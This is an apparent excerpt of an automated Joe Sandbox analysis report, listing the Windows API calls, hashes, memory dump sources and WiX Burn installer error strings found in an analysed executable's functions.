                                                                                                                                                          • Opcode Fuzzy Hash: 5f47e6ae56d99a80711aafda55421de0020ac255769dec215d0162df412683d6
                                                                                                                                                          • Instruction Fuzzy Hash: 4231B9B6A40208BBE711AA96CC86FAF77AC9B15714F10016BB904F7181E2789D1487B6
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,004029A7,?,?,00000000,?,00000100,00000000,00000000), ref: 004077F4
                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,004029A7,?,?,00000000,?,00000100,00000000,00000000,?,?,0040285E,?,00000100,?), ref: 004077FB
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • _memcpy_s.LIBCMT ref: 0040787F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$_memcpy_s
                                                                                                                                                          • String ID: Failed to get current memory size.$Failed to get new memory size.$Failed to reallocate memory$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                          • API String ID: 2739117398-3703727623
                                                                                                                                                          • Opcode ID: 1865d5d18e854cca9f9f787a972af80bf9684beb7f27fb01c8b5e8a62a55cfd5
                                                                                                                                                          • Instruction ID: 7d8ee2e853d949be682dda4ed5bbc9db0baf3bcb8879ae8c03d5bdcfb58e4369
                                                                                                                                                          • Opcode Fuzzy Hash: 1865d5d18e854cca9f9f787a972af80bf9684beb7f27fb01c8b5e8a62a55cfd5
                                                                                                                                                          • Instruction Fuzzy Hash: 08317F32E44208BBEB11AA54CC09FAF3A699B00714F108036FD04BA2D1E37CED10D7AA
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,004687C1,004221A7,?,?,00000001,?,00416E7F,?,DisplayName,00000000,004221A7,?,00000000,004221A7), ref: 004673DD
                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?,004687C1,004221A7,?,?,00000001,?,00416E7F,?,DisplayName,00000000,004221A7,?,00000000,004221A7), ref: 0046742F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value$Delete
                                                                                                                                                          • String ID: DisplayName$Failed to delete registry value: %ls$Failed to determine length of registry value: %ls$Failed to set registry value: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 1738766685-1872270729
                                                                                                                                                          • Opcode ID: 664b107cd992ff0bdcc4cd267dd6d14e92e55e89b4b6dc2a754b85243292dcd3
                                                                                                                                                          • Instruction ID: 77209b25f59c7ef9b1b3fb0a28065fd3474d11d1f27ecf2635437aace12360bf
                                                                                                                                                          • Opcode Fuzzy Hash: 664b107cd992ff0bdcc4cd267dd6d14e92e55e89b4b6dc2a754b85243292dcd3
                                                                                                                                                          • Instruction Fuzzy Hash: 0E21E676608115B7DB219A158C09F5F3A5ADB85778F154027FE08BB390FA3CCD01A6BE
                                                                                                                                                          APIs
                                                                                                                                                          • LCMapStringW.KERNEL32(0000007F,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00403B5F,?,?), ref: 00402BFD
                                                                                                                                                          • GetLastError.KERNEL32(?,00403B5F,?,?,?,00000200,?,0046E043,00000000,?,00000000,00000000,?,00000000,feclient.dll), ref: 00402C07
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastString
                                                                                                                                                          • String ID: Failed to allocate a copy of the source string.$Failed to convert the string case.$Failed to get the length of the string.$Source string is too long: %Iu$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                          • API String ID: 3728238275-3020688454
                                                                                                                                                          • Opcode ID: 0a30d6f7c512953fc241423d37520aa148feefe17f70861fbc0e4712beaaf9f9
                                                                                                                                                          • Instruction ID: 683e7c8d072793fbb98cd3117b623ac3c2af00d36b4eb4bf386326ed7615d761
                                                                                                                                                          • Opcode Fuzzy Hash: 0a30d6f7c512953fc241423d37520aa148feefe17f70861fbc0e4712beaaf9f9
                                                                                                                                                          • Instruction Fuzzy Hash: 03214C72B8432577E22169554C4AF7F361CAB11B64F11413BFE187B2D197BC9C0052AD
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0000000C,0000004C,00000001,?,00000000,00000000,?,00414AEE,00000000,00000000,?,00000000,?,00000000,004086B5,?), ref: 004388C3
                                                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00414AEE,00000000,00000000,?,00000000,?,00000000,004086B5,?,00000000,00000000), ref: 004388D3
                                                                                                                                                          • GetLastError.KERNEL32(?,00414AEE,00000000,00000000,?,00000000,?,00000000,004086B5,?,00000000,00000000,000000C4,00000000,00000000,?), ref: 004388E0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateCriticalErrorInitializeLastProcessSectionSemaphore
                                                                                                                                                          • String ID: Failed to allocate bootstrapper application engine context.$Failed to create queue for bootstrapper engine.$Failed to create semaphore for queue.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 791721421-10573605
                                                                                                                                                          • Opcode ID: 58f42c1755a4685e486f3fa25a46980e1b19d08cd3c60df95611dcf12ba937b7
                                                                                                                                                          • Instruction ID: 23f79f6a07f8eb0241a810aff17f0af4f5a2c20360186c548f495db807f54166
                                                                                                                                                          • Opcode Fuzzy Hash: 58f42c1755a4685e486f3fa25a46980e1b19d08cd3c60df95611dcf12ba937b7
                                                                                                                                                          • Instruction Fuzzy Hash: AA213AB2A8071537E220B2555C4AF67AA4C9F48B74F21413BF904BB2C1EABCDC0046ED
                                                                                                                                                          APIs
                                                                                                                                                          • CommandLineToArgvW.SHELL32(00000000,004080B0,00000000,004080B0,00000000,00000000,ignored ,00000000,00000000,00000000,?,?,?,004092CF,00000000,?), ref: 004647F1
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004092CF,00000000,?,?,00000003,00000000,004080B0,00000000,?,?,?,?,?), ref: 004647FB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArgvCommandErrorLastLine
                                                                                                                                                          • String ID: Failed to copy command line.$Failed to initialize command line.$Failed to parse command line.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\app2util.cpp$ignored
                                                                                                                                                          • API String ID: 3459693003-3520649959
                                                                                                                                                          • Opcode ID: e9ec82e7c201f63032278e6e3ab0ecc658141df1d426372726d0f0fafae62d9f
                                                                                                                                                          • Instruction ID: fad00116f694e405b040216eb79d543d4511dcbf9be9b44278ddf732229da4a1
                                                                                                                                                          • Opcode Fuzzy Hash: e9ec82e7c201f63032278e6e3ab0ecc658141df1d426372726d0f0fafae62d9f
                                                                                                                                                          • Instruction Fuzzy Hash: DD21D676A40324BBDB21AF558C0AF9F7A689B52B51F11406BFD04BB2C1F7788E00D699
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(0040955C), ref: 0046BC1C
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046BC66
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                          • String ID: $yG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectNodes$pixnParent parameter was null in XmlSelectNodes$ppixnChild parameter was null in XmlSelectNodes
                                                                                                                                                          • API String ID: 344208780-493328136
                                                                                                                                                          • Opcode ID: 6c90e2cd4b2639ecbf0ebd892603029a20705cd4f3e230f4f1851391f9e8d21c
                                                                                                                                                          • Instruction ID: 572c57df31926b5ddeb16800b62690c740c3985b4e6b97a7e65f228ad8cdb89a
                                                                                                                                                          • Opcode Fuzzy Hash: 6c90e2cd4b2639ecbf0ebd892603029a20705cd4f3e230f4f1851391f9e8d21c
                                                                                                                                                          • Instruction Fuzzy Hash: 9111B435B8031477E62129494C45F6B265DEB96B64F21403FFA04BB3D1EBAC8D4186ED
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(0040955C), ref: 0046BCF3
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046BD3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                          • String ID: $yG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectSingleNode$pixnParent parameter was null in XmlSelectSingleNode$ppixnChild parameter was null in XmlSelectSingleNode
                                                                                                                                                          • API String ID: 344208780-3202830318
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?), ref: 0044EA4B
• LeaveCriticalSection.KERNEL32(?,?,?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?,00000000), ref: 0044EA88
• ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?), ref: 0044EAB8
• GetLastError.KERNEL32(?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?,00000000,?,?), ref: 0044EAC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
• String ID: Failed to enqueue action.$Failed to signal queue semaphore.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
• API String ID: 540623443-899205991
APIs
• CreateFileW.KERNEL32(000000B0,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000,00000001,00000000,000000B0), ref: 00421A5D
• CloseHandle.KERNEL32(00000000), ref: 00421AEC
Strings
• -%ls=%Iu, xrefs: 00421A74, 00421AB7
• burn.filehandle.self, xrefs: 00421A6F, 00421AB2
• Failed to append the file handle to the obfuscated command line., xrefs: 00421ACD
• d:\a\wix\wix\src\burn\engine\core.cpp, xrefs: 00421A9C
• Failed to append the file handle to the command line., xrefs: 00421A8A
Similarity
• API ID: CloseCreateFileHandle
• String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self$d:\a\wix\wix\src\burn\engine\core.cpp
• API String ID: 3498533004-3441215842
APIs
• GetProcAddress.KERNEL32(PathAllocCanonicalize,api-ms-win-core-path-l1-1-0.dll), ref: 0046CB2B
• GetLastError.KERNEL32(?,?,0046CCF2,00000000,00000001,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046CB3A
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address of PathAllocCanonicalize.$Failed to load api-ms-win-core-path-l1-1-0.dll$PathAllocCanonicalize$api-ms-win-core-path-l1-1-0.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path2utl.cpp
• API String ID: 199729137-3685544007
APIs
  • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
  • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
• GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00469065
• GetLastError.KERNEL32(?,00408A3A,00000001,?,?,004084E0,?,?,?,004095F6,?,?,?), ref: 00469074
Strings
Similarity
• API ID: ErrorLast$AddressLibraryLoadProc
• String ID: Failed to find set restore point proc address.$Failed to initialize security for COM to talk to system restore.$SRSetRestorePointW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\srputil.cpp$srclient.dll
• API String ID: 1866314245-776416089
APIs
• GetModuleHandleW.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00000120,00000000,?,0041244F,00000124,00000120,?,00411DBC,000004A0,000004A0,00000120,00000000,000004A0,00000000), ref: 004666C5
• GetProcAddress.KERNEL32(00000000), ref: 004666CC
• GetLastError.KERNEL32(?,0041244F,00000124,00000120,?,00411DBC,000004A0,000004A0,00000120,00000000,000004A0,00000000,00000120,00000000,000004A0,00000120), ref: 004666F5
Strings
Similarity
• API ID: AddressErrorHandleLastModuleProc
• String ID: Failed to disable file system redirection.$Wow64DisableWow64FsRedirection$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp$kernel32
• API String ID: 4275029093-79649620
APIs
  • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
  • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
• GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 004678AF
• GetProcAddress.KERNEL32(RegGetValueW), ref: 004678C5
Strings
• Failed to load AdvApi32.dll, xrefs: 00467889
• RegDeleteKeyExW, xrefs: 004678A4
• RegGetValueW, xrefs: 004678B5
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467895
• AdvApi32.dll, xrefs: 00467879
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AddressProc$ErrorLastLibraryLoad
• String ID: AdvApi32.dll$Failed to load AdvApi32.dll$RegDeleteKeyExW$RegGetValueW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 856020675-45934097
Similarity
• API ID:
• String ID: Aborted cache verify payload signature begin.$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$d:\a\wix\wix\src\burn\engine\cache.cpp
• API String ID: 0-4228632460
Similarity
• API ID: ErrorLast
• String ID: Failed to copy host name.$Failed to copy password.$Failed to copy path.$Failed to copy query string.$Failed to copy user name.$Failed to crack URI.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\uriutil.cpp
• API String ID: 1452528299-3884538410
APIs
• GetLastError.KERNEL32(?,?,00472308,00000000,00000000,00000001), ref: 004724C4
• GetLastError.KERNEL32(?,?,00472308,00000000,00000000,00000001), ref: 00472526
Similarity
• API ID: ErrorLast
• String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
• API String ID: 1452528299-2906345047
APIs
  • Part of subcall function 0040241C: CreateDirectoryW.KERNELBASE(00000000,0040951C,?,00000000,?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 0040242A
  • Part of subcall function 0040241C: GetLastError.KERNEL32(?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 00402438
• lstrlenA.KERNEL32(?,00000000,00000140,00000000,00000140,00000001,00000001,00418D09,swidtag,00000140,00000001,?,00418D09,00000000,00000001,00000000), ref: 0041724A
  • Part of subcall function 00405B5B: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000001,00000000,?,00417261,00000001,00000080,?,00000000), ref: 00405B73
  • Part of subcall function 00405B5B: GetLastError.KERNEL32(?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140,?,?,?,?,?,000000B0), ref: 00405B80
Strings
• swidtag, xrefs: 00417206
• Failed to allocate regid folder path., xrefs: 004172D4
• Failed to format tag folder path., xrefs: 004172E8
• Failed to write tag xml to file: %ls, xrefs: 00417288
• d:\a\wix\wix\src\burn\engine\registration.cpp, xrefs: 004172B1, 004172FA
• Failed to create regid folder: %ls, xrefs: 0041729F
• Failed to allocate regid file path., xrefs: 004172C0
Similarity
• API ID: CreateErrorLast$DirectoryFilelstrlen
• String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$d:\a\wix\wix\src\burn\engine\registration.cpp$swidtag
• API String ID: 583680227-2075814422
APIs
• EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0044F969
• LeaveCriticalSection.KERNEL32(?), ref: 0044FAA5
Strings
• Engine is active, cannot change engine state., xrefs: 0044F981
• BA requested unknown payload with id: %ls, xrefs: 0044F9E1
• d:\a\wix\wix\src\burn\engine\externalengine.cpp, xrefs: 0044F993, 0044F9F3
• Failed to set source path for container., xrefs: 0044FA86
• Failed to set source path for payload., xrefs: 0044FA1F
• BA requested unknown container with id: %ls, xrefs: 0044FA5C
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: BA requested unknown container with id: %ls$BA requested unknown payload with id: %ls$Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$d:\a\wix\wix\src\burn\engine\externalengine.cpp
• API String ID: 3168844106-3917755568
APIs
• EnterCriticalSection.KERNEL32(00000004,-00000018,00000000,00000000,?,00000005,00000000), ref: 0046EC77
  • Part of subcall function 0046EE88: EnterCriticalSection.KERNEL32(0046EC90,00000000,00000000,?,0046EC8C,00000000,?,?,?), ref: 0046EE94
  • Part of subcall function 0046EE88: LeaveCriticalSection.KERNEL32(0046EC90,0046EC8C,?,?,?,?,0046EC8C,00000000,?,?,?), ref: 0046EECD
• LeaveCriticalSection.KERNEL32(?,00000000,?,00000008,00000000,?,?,?), ref: 0046ED75
  • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
  • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Similarity
• API ID: CriticalSection$EnterHeapLeave$AllocProcess
• String ID: Failed to allocate memory for RPC pipe results.$Failed to read result and size of message.$Failed to read result data.$Failed to send RPC pipe request.$RPC pipe client reported failure.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
• API String ID: 3222683422-2547529255
APIs
• EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,00000000,00000000,?,?,?,00409D68,00000000,?,00000000,?,00000000,?,00419CB9), ref: 0040A2EE
• LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,7FFFFFFE,?,00409D68,00000000,?,00000000,?,00000000,?,00419CB9,?,00000001,00000000), ref: 0040A40A
Strings
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 3168844106-1038398555
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 0042BA9D
• DefWindowProcW.USER32(?,?,?,?), ref: 0042BB15
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0042BB2C
  • Part of subcall function 0042B8C0: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000014,?,00000060,?,?,00000000,?,0042B7AA,?,00000060), ref: 0042B8FE
• DefWindowProcW.USER32(?,00000082,?,?), ref: 0042BB43
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 0042BB51
• PostQuitMessage.USER32(00000000), ref: 0042BB58
